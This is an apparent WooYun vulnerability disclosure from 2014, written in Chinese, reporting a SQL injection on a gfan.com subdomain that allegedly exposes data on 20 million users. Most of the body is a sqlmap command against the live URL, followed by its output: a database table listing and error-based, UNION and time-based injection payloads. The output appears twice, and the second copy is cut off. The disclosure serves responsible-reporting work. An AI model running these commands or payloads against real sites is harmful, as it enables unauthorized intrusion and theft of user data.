机锋网存在高危SQL注入漏洞还是可能导致2000w用户数据泄漏

发表于 2014年12月30日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2014-089323

漏洞标题：机锋网存在高危SQL注入漏洞还是可能导致2000w用户数据泄漏

漏洞详情

披露状态：

2014-12-30: 细节已通知厂商并且等待厂商处理中
2014-12-30: 厂商已经确认，细节仅向厂商公开
2015-01-09: 细节向核心白帽子及相关领域专家公开
2015-01-19: 细节向普通白帽子公开
2015-01-29: 细节向实习白帽子公开
2015-02-13: 细节向公众公开

简要描述：

机锋网存在高危SQL注入漏洞，还是2000w用户数据泄漏

详细说明：

sqlmap，随便拿一个数据库举例：

sqlmap -u "http://romgame.gfan.com/index.php/gtphone?areacode=*" --dbms=MySQL --risk=3 --level=5 --count -D hd --threads=10

1	sqlmap -u "http://romgame.gfan.com/index.php/gtphone?areacode=*" --dbms=MySQL --risk=3 --level=5 --count -D hd --threads=10

Database: hd<br>
+----------------------+---------+<br>
| Table                | Entries |<br>
+----------------------+---------+<br>
| rom_act_log          | 50973   |<br>
| rom_act_log_norepet  | 16045   |<br>
| autumn_taste_log     | 1747    |<br>
| autumn_draw_log      | 1161    |<br>
| rom_cellphone        | 193     |<br>
| autumn_draw_count    | 162     |<br>
| rom_apply_info       | 110     |<br>
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>
---<br>
Place: URI<br>
Parameter: #1*<br>
    Type: error-based<br>
    Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause<br>
    Payload: http://romgame.gfan.com:80/index.php/gtphone?areacode=-3398 OR (SELECT 3113 FROM(SELECT COUNT(*),CONCAT(0x7178736571,(SELECT (CASE WHEN (3113=3113) THEN 1 ELSE 0 END)),0x71626f7471,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)Type: UNION query<br>
    Title: MySQL UNION query (random number) - 3 columns<br>
    Payload: http://romgame.gfan.com:80/index.php/gtphone?areacode=-8998 UNION ALL SELECT 8335,8335,CONCAT(0x7178736571,0x6a765965564d414e516e,0x71626f7471)#Type: AND/OR time-based blind<br>
    Title: MySQL > 5.0.11 OR time-based blind<br>
    Payload: http://romgame.gfan.com:80/index.php/gtphone?areacode=-2114 OR 3908=SLEEP(5)<br>
---<br>
[12:46:20] [INFO] testing MySQL<br>
[12:46:21] [WARNING] automatically patching output having last char trimmed<br>
[12:46:21] [INFO] confirming MySQL<br>
[12:46:22] [INFO] the back-end DBMS is MySQL<br>
back-end DBMS: MySQL >= 5.0.0

Database: hd

+----------------------+---------+

| Table | Entries |

+----------------------+---------+

| rom_act_log | 50973 |

| rom_act_log_norepet | 16045 |

| autumn_taste_log | 1747 |

| autumn_draw_log | 1161 |

| rom_cellphone | 193 |

| autumn_draw_count | 162 |

| rom_apply_info | 110 |

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: URI

Parameter: #1*

Type: error-based

Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause

Payload: http://romgame.gfan.com:80/index.php/gtphone?areacode=-3398 OR (SELECT 3113 FROM(SELECT COUNT(*),CONCAT(0x7178736571,(SELECT (CASE WHEN (3113=3113) THEN 1 ELSE 0 END)),0x71626f7471,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)Type: UNION query

Title: MySQL UNION query (random number) - 3 columns

Payload: http://romgame.gfan.com:80/index.php/gtphone?areacode=-8998 UNION ALL SELECT 8335,8335,CONCAT(0x7178736571,0x6a765965564d414e516e,0x71626f7471)#Type: AND/OR time-based blind